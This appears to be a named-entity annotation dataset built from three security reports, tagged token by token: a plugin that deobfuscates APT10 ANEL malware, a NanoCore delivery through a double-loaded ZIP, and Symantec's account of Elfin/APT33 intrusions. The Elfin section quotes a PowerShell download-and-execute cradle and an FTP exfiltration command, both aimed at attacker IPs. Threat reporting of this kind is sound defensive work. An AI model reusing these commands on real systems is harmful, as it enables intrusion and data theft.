O + +Typically O +this O +event O +occurs O +a O +few O +times O +to O +several O +times O +, O + +so O +the O +callback O +can O +deobfuscate O +multiple O +control O +flow O +flattenings O +. O + +Other O +additional O +modifications O +were O +made O +to O +the O +code O +( O +e.g O +, O +writing O +a O +new O +algorithm O +for O +finding O +control O +flow O +dispatcher O +and O +first O +block O +, O + +validating O +a O +block O +comparison O +variable O +, O + +and O +so O +on O +) O + +. O + +After O +the O +modification O +, O + +for O +example O +, O + +the O +following O +functions O +with O +multiple O +control O +flow O +dispatchers O +can O +be O +unflattened O +. O + +The O +original O +implementation O +supports O +the O +following O +two O +cases O +of O +flattened O +blocks O +to O +find O +a O +block O +comparison O +variable O +for O +the O +next O +block O +( O +the O +cases O +are O +then O +simplified O +) O + +. O + +In O +the O +second O +case O +, O + +block O +comparison O +variable O +is O +searched O +in O +each O +block O +of O +endsWithJcc S-TOOL +and O +nonJcc S-TOOL +. O + +If O +the O +next O +block O +is O +resolved O +, O + +the O +CFG O +( O +specifically O +mblock_t B-TOOL +: I-TOOL +:p I-TOOL +redset E-TOOL +and O +mblock_t B-TOOL +: I-TOOL +:s I-TOOL +uccset E-TOOL +) O + +and O +the O +destination O +of O +goto O +jump O +instruction O +are O +updated O +. O + +The O +code O +tracks O +the O +block O +comparison O +variable O +in O +each O +predecessor O +and O +more O +( O +if O +any O +conditional O +blocks O +before O +the O +predecessor O +) O + +to O +identify O +each O +next O +block O +for O +unflattening O +. O + +And O +, O + +in O +the O +third O +case O +that O +was O +implemented O +, O + +the O +block O +comparison O +variables O +are O +not O +assigned O +in O +the O +flattened O +blocks O +but O +rather O +the O +first O +blocks O +according O +to O +a O +condition O +. 
O + +For O +example O +, O + +the O +following O +microcode O +graph O +shows O +edi O +is O +assigned O +to O +esi O +( O +the O +block O +comparison O +variable O +in O +this O +case O +) O + +in O +block O +number O +7 O +but O +the O +edi O +value O +is O +assigned O +in O +block O +number O +1 O +and O +2 O +. O + +If O +the O +immediate O +value O +for O +block O +comparison O +variable O +is O +not O +found O +in O +the O +flattened O +blocks O +, O + +the O +new O +code O +tries O +to O +trace O +the O +first O +blocks O +to O +obtain O +the O +value O +and O +reconnects O +block O +number O +1 O +and O +2 O +as O +successors O +of O +block O +number O +7 O +, O + +in O +addition O +to O +normal O +operations O +mentioned O +in O +the O +original O +cases O +. O + +In O +this O +case O +, O + +the O +code O +parses O +the O +structure O +in O +first O +blocks O +then O +reconnects O +each O +conditional O +blocks O +under O +the O +flattened O +blocks O +( O +#1 O +and O +#2 O +as O +successors O +of O +#13 O +, O + +#3 O +and O +#4 O +as O +successors O +of O +#11 O +) O + +. O + +Last O +, O + +but O +not O +least O +, O + +in O +all O +cases O +explained O +here O +, O + +the O +tail O +instruction O +of O +the O +dispatcher O +predecessor O +can O +be O +a O +conditional O +jump O +like O +jnz O +, O + +not O +just O +goto O +. O + +The O +modified O +code O +checks O +the O +tail O +instruction O +and O +if O +the O +true O +case O +destination O +is O +a O +control O +flow O +dispatcher O +, O + +it O +updates O +the O +CFG O +and O +the O +destination O +of O +the O +instruction O +. O + +The O +following O +changes O +are O +minor O +compared O +with O +above O +referenced O +ones O +. 
O + +Additional O +jump O +instructions O +are O +supported O +when O +collecting O +block O +comparison O +variable O +candidates O +and O +mapping O +between O +the O +variable O +and O +ea O +or O +block O +number O +( O +jnz/jle O +in O +JZCollector S-TOOL +, O + +jnz O +in O +JZMapper S-TOOL +) O + +. O + +An O +entropy O +threshold O +adjustment O +due O +to O +check O +in O +high O +maturity O +level O +. O + +Multiple O +block O +tracking O +for O +getting O +block O +comparison O +variable O +. O + +And O +the O +last O +change O +that O +was O +introduced O +in O +regards O +to O + +the O +block O +update O +variable O +referred O +in O +the O +overview O +. O + +Some O +functions O +in O +the O +ANEL S-MAL +sample O +utilize O +this O +, O + +however O +the O +assignment O +is O +a O +little O +bit O +tricky O +. O + +By O +using O +the O +and O +instruction O +, O + +the O +immediate O +values O +used O +in O +comparison O +look O +different O +from O +assigned O +ones O +. O + +The O +modified O +code O +will O +consider O +this O +. O + +The O +modified O +tool O +was O +tested O +with O +an O +ANEL S-MAL +5.4.1 O +payload O +dropped O +from O +a O +malicious O +document O +with O +the O +following O +hash O +( O +previously O +reported O +by O +FireEye S-SECTEAM +) O +: O + +3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d S-SHA2 +. O + +The O +code O +is O +able O +to O +deobfuscate O +34 O +of O +38 O +functions O +( O +89% O +) O + +. O + +It O +should O +be O +noted O +every O +function O +is O +not O +always O +obfuscated O +. O + +The O +failure O +examples O +are O +: O + + +Not O +yet O +implemented O +cases O +( O +e.g O +, O + +a O +conditional O +jump O +of O +the O +dispatcher O +predecessor’s O +tail O +instruction O +in O +goto O +N O +predecessors O +case O +, O + +consecutive O +if-statement O +flattened O +blocks O +) O + +. 
O + +An O +incorrect O +choice O +of O +control O +flow O +dispatcher O +and O +first O +block O +( O +algorithm O +error O +) O + +. O + +These O +fixes O +will O +be O +prioritized O +for O +future O +releases O +. O + +Additionally O +there O +is O +a O +known O +issue O +with O +the O +result O +( O +e.g O +, O +the O +remaining O +loop O +or O +paradoxical O +decompiled O +code O +) O + +, O + +using O +the O +following O +IDAPython S-TOOL +command O +in O +Output O +window O +: O + + +idc.load_and_run_plugin O + +( O + +“ O +HexRaysDeob S-TOOL +” O + +, O + +0xdead O +) O + +. O + +The O +command O +will O +instruct O +the O +code O +to O +execute O +only O +opaque O +predicates O +deobfuscation O +in O +the O +current O +selected O +function O +. O + +This O +allows O +an O +analyst O +to O +quickly O +check O +if O +there O +are O +any O +lost O +blocks O +by O +control O +flow O +unflattening O +. O + +After O +the O +check O +, O + +the O +original O +result O +can O +be O +restored O +by O +using O +the O +following O +command O +: O + + +idc.load_and_run_plugin O + +( O + +“ O +HexRaysDeob S-TOOL +” O + +, O + +0xf001 O +) O + +. O + +The O +compiler-level O +obfuscations O +like O +opaque O +predicates O +and O +control O +flow O +flattening O +are O +started O +to O +be O +observed O +in O +the O +wild O +by O +analyst O +and O +researchers O +. O + +Currently O +malware O +with O +the O +obfuscations O +is O +limited O +, O + +however O +TAU S-SECTEAM +expects O +not O +only O +APT10 S-APT +but O +also O +other O +threat O +actors O +will O +start O +to O +use O +them O +. O + +Unfortunately O +, O + +in O +order O +to O +break O +the O +techniques O +we O +have O +to O +understand O +both O +of O +the O +obfuscation O +mechanisms O +and O +disassembler O +tool O +internals O +before O +we O +can O +automate O +the O +process O +. 
O + +TAU S-SECTEAM +modified O +the O +original O +HexRaysDeob S-TOOL +to O +make O +it O +work O +for O +APT10 S-APT +ANEL S-MAL +obfuscations O +. O + +The O +modified O +code O +is O +available O +publically O +here O +. O + +The O +summary O +of O +the O +modifications O +is O +: O + + +New O +patterns O +and O +data-flow O +tracking O +for O +opaque O +predicates O +. O + +Analysis O +in O +multiple O +maturity O +levels O +, O + +considering O +multiple O +control O +flow O +dispatchers O +and O +various O +jump O +cases O +for O +control O +flow O +flattening O +. O + +The O +tool O +can O +work O +for O +almost O +all O +obfuscated O +functions O +in O +the O +tested O +sample O +. O + +This O +implementation O +will O +deobfuscate O +approximately O +89% O +of O +encountered O +functions O +. O + +This O +provides O +researchers O +and O +analyst O +broad O +tool O +to O +attack O +this O +type O +of O +obfuscation O +, O + +and O +if O +it O +adopted O +in O +other O +families O +. O + +In O +should O +be O +noted O +that O +the O +tool O +may O +not O +work O +for O +the O +updated O +versions O +of O +ANEL S-APT +if O +they O +are O +compiled O +with O +different O +options O +of O +the O +obfuscating O +compiler O +. O + +Testing O +in O +multiple O +versions O +is O +important O +, O + +so O +TAU S-SECTEAM +is O +looking O +for O +newer O +versions O +ANEL S-APT +samples O +. O + +Please O +reach O +out O +to O +our O +unit O +if O +you O +have O +relevant O +samples O +or O +need O +assistance O +in O +deobfuscating O +the O +codes O +. O + + +Double O +Loaded O +Zip O +File O +Delivers O +Nanocore O +Most O +malware O +sent O +via O +emails S-TOOL +is O +packaged O +in O +archives O +such O +as O +ZIP, O +RAR, O +and O +7z O +(7-Zip +) O +. O + +Occasionally, O +we O +encounter O +some O +clever O +and O +creative O +ways O +these O +malicious O +archives O +are O +crafted +. 
O + +Here O +we O +will O +examine O +an O +example O +of O +an O +oddly O +formatted O +ZIP O +archive O +hiding O +the O +NanoCore S-MAL +malware +. O + +We O +spotted O +a O +courier O +themed O +spam O +campaign O +on O +our O +Secure B-TOOL +Email I-TOOL +Gateway E-TOOL +(SEG S-TOOL +) O +cloud O +recently +. O + +The O +message O +claimed O +to O +be O +from O +an O +Export O +Operation O +Specialist O +of O +USCO B-IDTY +Logistics E-IDTY +and O +that O +it O +was O +sent O +as O +per O +their O +customer O +request +. O + +Aside O +from O +this, O +there O +were O +several O +other O +suspicious O +items O +we O +noted: O +Headers O +mismatched: O +The O +Reply-To O +and O +From O +email S-TOOL +address O +were O +different +. O + +Furthermore, O +the O +email S-TOOL +address O +used O +in O +Reply-To O +is O +from O +a O +free O +email S-TOOL +client O +Gmail +. O + +Suspicious O +message O +body: O +The O +attachment O +was O +mentioned O +in O +the O +message O +body O +twice, O +making O +sure O +to O +direct O +the O +reader’s O +attention O +towards O +the O +attachment +. O + +Suspicious O +attachment O +name: O +The O +name O +of O +attachment O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +ends O +with O +pdf.zip S-FILE +. O + +That O +usually O +means O +that O +the O +name O +of O +the O +file O +inside O +the O +archive O +ends O +with O +2 O +known O +file O +extensions O +“pdf.” O +(archiving O +tools O +usually O +defaults O +the O + O +to O +the O +archive’s O +format O +e.g. O +zip +) O +. O + +The O +attachment O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +makes O +this O +message O +stand O +out +. O + +The O +ZIP O +file O +had O +a O +file O +size O +significantly O +greater O +than O +that O +of O +its O +uncompressed O +content +. 
O + +Typically, O +the O +size O +of O +the O +ZIP O +file O +should O +be O +less O +than O +the O +uncompressed O +content O +or, O +in O +some O +cases, O +ZIP O +files O +will O +grow O +larger O +than O +the O +original O +files O +by O +a O +reasonable O +number O +of O +bytes +. O + +ZIP O +archives O +are O +supposed O +to O +have O +one O +“End O +of O +Central O +Directory” O +(EOCD) O +signifying O +the O +end O +of O +the O +archive +. O + +Looking O +deeper O +into O +the O +structure O +of O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +, O +the O +attachment O +has O +two O +EOCDs +. O + +After O +the O +first O +EOCD O +comes O +some O +extra O +data O +– O +another O +ZIP O +file O +structure +. O + +It O +turns O +out O +that O +the O +first O +ZIP O +structure O +is O +for O +the O +image O +file O +order.jpg S-FILE +while O +the O +second O +one O +is O +for O +an O +executable O +file O +SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE +. O + +Both O +are O +compressed O +when O +archived, O +and O +both O +indicate O +that O +they O +are O +the O +only O +file O +in O +their O +ZIP O +structures O +as O +indicated O +in O +their O +local O +file O +headers O +and O +EOCDs O +respectively +. O + +The O +image O +file O +“order.jpg” O +contained O +in O +the O +first O +ZIP O +structure O +is O +actually O +a O +non-malicious O +PNG O +formatted O +image O +file +. O + +This O +serves O +as O +a O +decoy, O +an O +attempt O +to O +hide O +the O +content O +of O +the O +other O +ZIP O +structure +. O + +The O +image O +file O +has O +been O +correctly O +identified O +by O +SEG O +as O +a O +PNG O +when O +its O +file O +extension O +is O +.jpg S-FILE +denoting O +a O +JPEG O +formatted O +image +. O + +The O +second O +ZIP O +structure O +contains O +SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE +, O +which O +is O +a O +NanoCore S-MAL +RAT +. 
O + +This O +remote O +access O +Trojan S-MAL +has O +the O +capability O +that O +allows O +an O +attacker O +to O +completely O +take O +control O +of O +the O +compromised O +machine +. O + +It O +connects O +to O +its O +command O +and O +control O +server O +at O +194.5.98.85 S-IP +on O +port O +11903 +. O + +This O +NanoCore S-MAL +RAT O +is O +version O +1.2.2.0 O +which O +has O +been O +found O +to O +be O +offered O +for O +free O +on O +the O +Dark B-IDTY +Web E-IDTY +just O +a O +few O +months O +ago +. O + +We O +used O +different O +archiving O +tools O +such O +as O +PowerArchiver B-TOOL +2019 E-TOOL +, O +WinZip S-TOOL +, O +WinRar S-TOOL +, O +7Zip S-TOOL +, O +and O +unzIP S-TOOL S-TOOL +that O +is O +built O +into O +the O +Windows S-OS +OS O +in O +attempting O +to O +extract O +the O +content O +of O +the O +attachment O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +. O + +Among O +these O +5 O +tools, O +only O +WinZip S-TOOL +and O +Windows’ O +unzIP S-TOOL S-TOOL +were O +not O +able O +to O +extract O +anything O +from O +the O +ZIP O +file O +as O +they O +encountered O +an O +error O +at O +the O +start O +of O +the O +extraction O +process +. O + +The O +other O +archiving O +tools O +were O +able O +to O +extract O +one O +file O +from O +the O +ZIP O +attachment O +– O +either O +order.jpg B-FILE +or I-FILE +SHIPPING_MX00034900_PL_INV_pdf.exe E-FILE +. O + + +WinZip S-TOOL +version O +11.2 O +and O +24.0, O +and O +the O +built-in O +unzIP S-TOOL S-TOOL +tool O +in O +Windows S-OS +, O +recognized O +that O +the O +attachment O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +is O +an O +invalid O +archive +. O + +Only O +WinZip S-TOOL +gave O +an O +explicit O +reason O +– O +the O +start O +of O +central O +directory O +of O +the O +ZIP O +was O +not O +found +. O + +The O +central O +directory O +it O +pertained O +to O +is O +the O +one O +in O +the O +second O +ZIP O +structure +. 
O + +At O +figure O +2, O +the O +second O +EOCD O +indicates O +that O +its O +only O +central O +directory O +is O +located O +at O +file O +offset O +0xd148f O +whereas O +it O +is O +at O +0xd40d41. O +(The O +size O +of O +the O +first O + +ZIP O +structure O +was O +not O +considered.) O +Meanwhile, O +the O +archiving O +tools O +PowerArchiver B-TOOL +2019 E-TOOL +, O +WinRar S-TOOL +, O +and O +7Zip S-TOOL +were O +able O +to O +extract O +a O +file O +from O +the O +attachment O +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +. O + +The O +latest O +versions O +of O +PowerArchiver B-TOOL +2019 E-TOOL +and O +WinRar S-TOOL +displayed O +in O +their O +respective O +UI O +the O +executable O +SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE +as O +the O +only O +content O +of O +the O +ZIP O +attachment +. O + +No O +error O +or O +warning O +was O +prompted O +during O +the O +extraction +. O + +Older O +versions O +of O +7Zip S-TOOL +also O +behave O +like O +PowerArchiver S-TOOL +and O +WinRAR S-TOOL +. O +7Zip S-TOOL +version O +9.22 O +and O +older O +saw O +the O +executable O +as O +well +. O + +However, O +starting O +from O +7Zip S-TOOL +version O +9.34 O +(next O +available O +installer O +after O +version O +9.22) O +up O +to O +its O +latest O +version O +19.0, O +7zip S-TOOL +saw O +and O +was O +able O +to O +extract O +the O +image O +file O +order.jpg S-FILE +instead +. O + +The O +second O +ZIP O +structure O +was O +treated O +as O +extra O +data; O +hence, O +a O +warning O +was O +added O +to O +the O +extracted O +image O +file’s O +properties +. O + +Among O +the O +archiving O +tools O +we O +tried, O +WinRar S-TOOL +3.30 O +behaved O +differently O +and O +unexpectedly +. O + +The O +content O +of O +the O +ZIP O +attachment O +it O +displayed O +in O +its O +UI O +was O +not O +the O +one O +it O +extracted! O +This O +sample O +challenges O +gateways O +scanners +. 
O + +Depending O +on O +the O +type O +of O +decompression O +engine O +used, O +there O +is O +a O +good O +probability O +that O +only O +the O +decoy O +file O +may O +be O +scrutinized O +and O +vetted, O +and O +the O +malicious O +content O +unnoticed O +– O +just O +like O +how O +some O +of O +the O +most O +popular O +archiving O +tools O +failed O +to O +notice O +the O +second O +ZIP O +structure +. O + +Despite O +what O +the O +gateway O +does, O +this O +attack O +would O +only O +succeed O +if O +the O +message O +got O +through O +the O +gateway O +and O +a O +particular O +archive O +utility O +is O +used O +by O +the O +end-user, O +such O +as O +certain O +versions O +of O +PowerArchiver S-TOOL +, O +WinRar S-TOOL +, O +and O +older O +7Zip S-TOOL +as O +described O +above +. O + +In O +this O +case, O +the O +Trustwave O +Secure O +email S-TOOL +Gateway O +flagged O +the O +message O +as O +suspicious O +and O +it O +did O +not O +get O +through +. O + +Nevertheless, O +this O +case O +does O +highlight O +the O +types O +of O +tricks O +the O +bad O +guys O +are O +using O +in O +an O +attempt O +to O +deliver O +malware O +through O +email +. O + +SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE +: O +9474e1517c98d4165300a49612888d16643efbf6 S-SHA1 +. O + + +Elfin S-APT +: O +Relentless O +Espionage O +Group O +Targets O +Multiple O +Organizations O +in O +Saudi B-LOC +Arabia E-LOC +and O +U.S S-LOC +. O + +The O +Elfin S-APT +espionage O +group O +( O +aka O +APT33 S-APT +) O +has O +remained O +highly O +active O +over O +the O +past O +three O +years O +, O +attacking O +at O +least O +50 O +organizations O +in O +Saudi B-LOC +Arabia E-LOC +, O +the O +United B-LOC +States E-LOC +, O +and O +a O +range O +of O +other O +countries O +. 
O + +The O +group O +, O +which O +first O +became O +active O +in O +late O +2015 S-TIME +or O +early O +2016 S-TIME +, O +specializes O +in O +scanning O +for O +vulnerable O +websites O +and O +using O +this O +to O +identify O +potential O +targets O +, O +either O +for O +attacks O +or O +creation O +of O +command O +and O +control O +( O +C&C O +) O +infrastructure O +. O + +It O +has O +compromised O +a O +wide O +range O +of O +targets O +, O +including O +governments S-IDTY +along O +with O +organizations O +in O +the O +research O +, O +chemical O +, O +engineering O +, O +manufacturing O +, O +consulting O +, O +finance O +, O +telecoms O +, O +and O +several O +other O +sectors O +. O + +Elfin S-APT +continues O +to O +be O +focused O +heavily O +on O +Saudi B-LOC +Arabia E-LOC +, O +which O +accounted O +for O +42 O +percent O +of O +attacks O +observed O +by O +Symantec S-SECTEAM +since O +the O +beginning O +of O +2016 S-TIME +. O + +However O +, O +the O +U.S. S-LOC +has O +also O +been O +a O +country O +of O +significant O +interest O +to O +the O +group O +, O +with O +18 O +organizations O +attacked O +over O +the O +past O +three O +years O +, O +including O +a O +number O +of O +Fortune O +500 O +companies O +. O + +Elfin S-APT +targets O +in O +the O +U.S. S-LOC +have O +included O +organizations O +in O +the O +engineering O +, O +chemical O +, O +research O +, O +energy O +consultancy O +, O +finance O +, O +IT O +, O +and O +healthcare O +sectors O +. O + +Some O +of O +these O +U.S. S-LOC +organizations O +may O +have O +been O +targeted O +by O +Elfin S-APT +for O +the O +purpose O +of O +mounting O +supply O +chain O +attacks O +. O + +In O +one O +instance O +, O +a O +large O +U.S. S-LOC +company O +was O +attacked O +in O +the O +same O +month O +a O +Middle B-LOC +Eastern E-LOC +company O +it O +co-owns O +was O +also O +compromised O +. 
O + +In O +a O +recent O +wave O +of O +attacks O +during O +February B-TIME +2019 E-TIME +, O +Elfin S-APT +attempted O +to O +exploit O +a O +known O +vulnerability O +( O +CVE-2018-20250 S-VULID +) O +in O +WinRAR S-TOOL +, O +the O +widely O +used O +file O +archiving O +and O +compression O +utility O +capable O +of O +creating O +self-extracting O +archive O +files O +. O + +The O +exploit O +was O +used O +against O +one O +target O +in O +the O +chemical O +sector O +in O +Saudi B-LOC +Arabia E-LOC +. O + +If O +successfully O +exploited O +on O +an O +unpatched O +computer O +, O +the O +vulnerability O +could O +permit O +an O +attacker O +to O +install O +any O +file O +on O +the O +computer O +, O +which O +effectively O +permits O +code O +execution O +on O +the O +targeted O +computer O +. O + +Two O +users O +in O +the O +targeted O +organization O +received O +a O +file O +called O +" O +JobDetails.rar S-FILE +" O +, O +which O +attempted O +to O +exploit O +the O +WinRAR S-TOOL +vulnerability O +. O + +This O +file O +was O +likely O +delivered O +via O +a O +spear-phishing B-ACT +email E-ACT +. O + +However O +, O +prior O +to O +this O +attempted O +attack O +, O +Symantec S-SECTEAM +had O +rolled O +out O +proactive O +protection O +against O +any O +attempt O +to O +exploit O +this O +vulnerability O +( O +Exp.CVE-2018-20250 S-VULID +) O +. O + +This O +protection O +successfully O +protected O +the O +targeted O +organization O +from O +being O +compromised O +. O + +Elfin S-APT +came O +under O +the O +spotlight O +in O +December B-TIME +2018 E-TIME +when O +it O +was O +linked O +with O +a O +new O +wave O +of O +Shamoon S-APT +attacks O +. O + +One O +Shamoon S-APT +victim O +in O +Saudi B-LOC +Arabia E-LOC +had O +recently O +also O +been O +attacked O +by O +Elfin S-APT +and O +had O +been O +infected O +with O +the O +Stonedrill S-MAL +malware O +( O +Trojan.Stonedrill S-MAL +) O +used O +by O +Elfin S-APT +. 
O + +Because O +the O +Elfin S-APT +and O +the O +Shamoon S-APT +attacks O +against O +this O +organization O +occurred O +so O +close O +together O +, O +there O +has O +been O +speculation O +that O +the O +two O +groups O +may O +be O +linked O +. O + +However O +, O +Symantec S-SECTEAM +has O +found O +no O +further O +evidence O +to O +suggest O +Elfin S-APT +was O +responsible O +for O +these O +Shamoon S-APT +attacks O +to O +date O +. O + +We O +continue O +to O +monitor O +the O +activities O +of O +both O +groups O +closely O +. O + +Elfin S-APT +has O +deployed O +a O +wide O +range O +of O +tools O +in O +its O +attacks O +including O +custom O +malware O +, O +commodity O +malware O +, O +and O +open-source O +hacking O +tools O +. O + +Custom O +malware O +used O +by O +the O +group O +include O +: O + +Notestuk S-MAL +( O +Backdoor.Notestuk S-MAL +) O +( O +aka O +TURNEDUP S-MAL +) O +: O +Malware O +that O +can O +be O +used O +to O +open O +a O +backdoor O +and O +gather O +information O +from O +a O +compromised O +computer O +. O + +Stonedrill S-MAL +( O +Trojan.Stonedrill S-MAL +) O +: O +Custom O +malware O +capable O +of O +opening O +a O +backdoor O +on O +an O +infected O +computer O +and O +downloading O +additional O +files O +. O + +The O +malware O +also O +features O +a O +destructive O +component O +, O +which O +can O +wipe O +the O +master O +boot O +record O +of O +an O +infected O +computer O +. O + +AutoIt B-MAL +backdoor E-MAL +: O +A O +custom O +built O +backdoor O +written O +in O +the O +AutoIt O +scripting O +language O +. O + +In O +addition O +to O +its O +custom O +malware O +, O +Elfin S-APT +has O +also O +used O +a O +number O +of O +commodity O +malware O +tools O +, O +available O +for O +purchase O +on O +the O +cyber O +underground O +. 
O + +These O +include O +: O + +Remcos S-MAL +( O +Backdoor.Remvio S-MAL +) O +: O +A O +commodity O +remote O +administration O +tool O +( O +RAT O +) O +that O +can O +be O +used O +to O +steal O +information O +from O +an O +infected O +computer O +. O + +DarkComet S-MAL +( O +Backdoor.Breut S-MAL +) O +: O +Another O +commodity O +RAT O +used O +to O +open O +a O +backdoor O +on O +an O +infected O +computer O +and O +steal O +information O +. O + +Quasar B-MAL +RAT E-MAL +( O +Trojan.Quasar S-MAL +) O +: O +Commodity O +RAT O +that O +can O +be O +used O +to O +steal O +passwords O +and O +execute O +commands O +on O +an O +infected O +computer O +. O + +Pupy B-MAL +RAT E-MAL +( O +Backdoor.Patpoopy S-MAL +) O +: O +Commodity O +RAT O +that O +can O +open O +a O +backdoor O +on O +an O +infected O +computer O +. O + +NanoCore S-MAL +( O +Trojan.Nancrat S-MAL +) O +: O +Commodity O +RAT O +used O +to O +open O +a O +backdoor O +on O +an O +infected O +computer O +and O +steal O +information O +. O + +NetWeird S-MAL +( O +Trojan.Netweird.B S-MAL +) O +: O +A O +commodity O +Trojan S-MAL +which O +can O +open O +a O +backdoor O +and O +steal O +information O +from O +the O +compromised O +computer O +. O + +It O +may O +also O +download O +additional O +potentially O +malicious O +files O +. O + +Elfin S-APT +also O +makes O +frequent O +use O +of O +a O +number O +of O +publicly O +available O +hacking O +tools O +, O +including O +: O + +LaZagne S-MAL +( O +SecurityRisk.LaZagne S-MAL +) O +: O +A O +login/password O +retrieval O +tool O +. O + +Mimikatz S-MAL +( O +Hacktool.Mimikatz S-MAL +) O +: O +Tool O +designed O +to O +steal O +credentials O +. O + +Gpppassword S-MAL +: O +Tool O +used O +to O +obtain O +and O +decrypt O +Group O +Policy O +Preferences O +( O +GPP O +) O +passwords O +. O + +SniffPass S-MAL +( O +SniffPass S-MAL +) O +: O +Tool O +designed O +to O +steal O +passwords O +by O +sniffing O +network O +traffic O +. 
O + +In O +this O +section O +, O +we O +describe O +in O +detail O +an O +Elfin S-APT +attack O +on O +a O +U.S. S-LOC +organization O +. O + +On O +February B-TIME +12 I-TIME +, I-TIME +2018 I-TIME +at I-TIME +16:45 E-TIME +( O +all O +times O +are O +in O +the O +organization’s O +local O +time O +) O +, O +an O +email S-TOOL +was O +sent O +to O +the O +organization O +advertising O +a O +job O +vacancy O +at O +an O +American S-LOC +global O +service O +provider O +. O + +The O +email S-TOOL +contained O +a O +malicious O +link O +to O +http://mynetwork.ddns.net:880 S-URL +. O + +The O +recipient O +clicked O +the O +link O +and O +proceeded O +to O +download O +and O +open O +a O +malicious O +HTML O +executable O +file O +, O +which O +in O +turn O +loaded O +content O +from O +a O +C&C O +server O +via O +an O +embedded O +iframe O +. O + +At O +the O +same O +time O +, O +code O +embedded O +within O +this O +file O +also O +executed O +a O +powershell S-TOOL +command O +to O +download O +and O +execute O +a O +copy O +of O +chfeeds.vbe S-FILE +from O +the O +C&C B-TOOL +server E-TOOL +. O +[System.Net.ServicePointManager] O +: O +:S O +erverCertificateValidationCallback={$true};IEX O +(New-Object O +Net.WebClient O +) O +.DownloadString O +( O +' O +https://217.147.168.46:8088/index.jpg S-URL +' O +) O +. O + +A O +second O +JavaScript O +command O +was O +also O +executed O +, O +which O +created O +a O +scheduled O +task O +to O +execute O +chfeeds.vbe S-FILE +multiple O +times O +a O +day O +. O + +The O +chfeeds.vbe S-FILE +file O +acts O +as O +a O +downloader O +and O +was O +used O +to O +download O +a O +second O +powershell S-TOOL +script O +( O +registry.ps1 S-FILE +) O +. 
O + +This O +script O +in O +turn O +downloaded O +and O +executed O +a O +PowerShell B-MAL +backdoor E-MAL +known O +as O +POSHC2 S-MAL +, O +a O +proxy-aware B-TOOL +C&C I-TOOL +framework E-TOOL +, O +from O +the O +C&C O +server O +( O +https:// B-URL +host-manager.hopto.org E-URL +) O +. O + +Later O +at O +20:57 S-TIME +, O +the O +attackers O +became O +active O +on O +the O +compromised O +machine O +and O +proceeded O +to O +download O +the O +archiving O +tool O +WinRAR S-TOOL +. O +89.34.237.118 B-IP +808 E-IP +http://89.34.237.118:808/Rar32.exe S-URL +. O + +At O +23:29 S-TIME +, O +the O +attackers O +then O +proceeded O +to O +deploy O +an O +updated O +version O +of O +their O +POSHC2 S-MAL +stager O +. O +192.119.15.35 B-IP +880 E-IP +http://mynetwork.ddns.net:880/st-36-p4578.ps1 S-URL +. O + +This O +tool O +was O +downloaded O +several O +times O +between O +23:29 B-TIME +on I-TIME +February I-TIME +12 E-TIME +and O +07:47 B-TIME +on I-TIME +February I-TIME +13 E-TIME +. O + +Two O +days O +later O +, O +on O +February B-TIME +14 I-TIME +at I-TIME +15:12 E-TIME +, O +the O +attackers O +returned O +and O +installed O +Quasar B-MAL +RAT E-MAL +onto O +the O +infected O +computer O +that O +communicated O +with O +a O +C&C O +server O +( O +217.147.168.123 S-IP +) O +. O + +Quasar B-MAL +RAT E-MAL +was O +installed O +to O +CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe S-FILE +. O + +At O +this O +point O +, O +the O +attackers O +ceased O +activity O +while O +maintaining O +access O +to O +the O +network O +until O +February B-TIME +21 E-TIME +. O + +At O +06:38 S-TIME +, O +the O +attackers O +were O +observed O +downloading O +a O +custom O +.NET B-MAL +FTP E-MAL +tool O +to O +the O +infected O +computer O +. O +192.119.15.36 B-IP +880 E-IP +http://192.119.15.36:880/ftp.exe S-URL +. 
O + +Later O +at O +6:56 S-TIME +, O +the O +attackers O +exfiltrated O +data O +using O +this O +FTP S-TOOL +tool O +to O +a O +remote O +host: O +JsuObf.exe S-FILE +Nup#Tntcommand O +-s O +CSIDL_PROFILE\appdata\roaming\adobe\rar O +-a O +ftp://89.34.237.118:2020 O +-f/[REDACTED]-u[REDACTED]-p[REDACTED] O +. O + +Activity O +ceased O +until O +the O +attackers O +returned O +on O +March B-TIME +5 E-TIME +and O +were O +observed O +using O +Quasar B-MAL +RAT E-MAL +to O +download O +a O +second O +custom O +AutoIt B-MAL +FTP E-MAL +Exfiltration S-ACT +tool O +known O +as O +FastUploader S-MAL +from O +http://192.119.15.36:880/ftp.exe S-URL +. O + +This O +tool O +was O +then O +installed O +to O +csidl_profile\appdata\roaming\adobe\ftp.exe S-FILE +. O + +FastUploader S-MAL +is O +a O +custom O +FTP S-TOOL +tool O +designed O +to O +exfiltrate O +data O +at O +a O +faster O +rate O +than O +traditional O +FTP S-TOOL +clients O +. O + +At O +this O +point O +, O +additional O +activity O +from O +the O +attackers O +continued O +between O +March B-TIME +5 E-TIME +into O +April S-TIME +, O +and O +on O +April B-TIME +18 I-TIME +at I-TIME +11:50 E-TIME +, O +a O +second O +remote O +access O +tool O +known O +as O +DarkComet S-MAL +was O +deployed O +to O +csidl_profile\appdata\roaming\microsoft\windows\start O +menu\programs\startup\smss.exe S-FILE +on O +the O +infected O +computer O +. O + +This O +was O +quickly O +followed O +15 O +seconds O +later O +by O +the O +installation O +of O +a O +credential O +dumping O +to O +csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe S-FILE +, O +and O +the O +execution O +of O +powershell S-TOOL +commands O +via O +PowerShell B-TOOL +Empire E-TOOL +, O +a O +freely O +available O +post-exploitation O +framework O +, O +to O +bypass O +logging O +on O +the O +infected O +machine O +. 
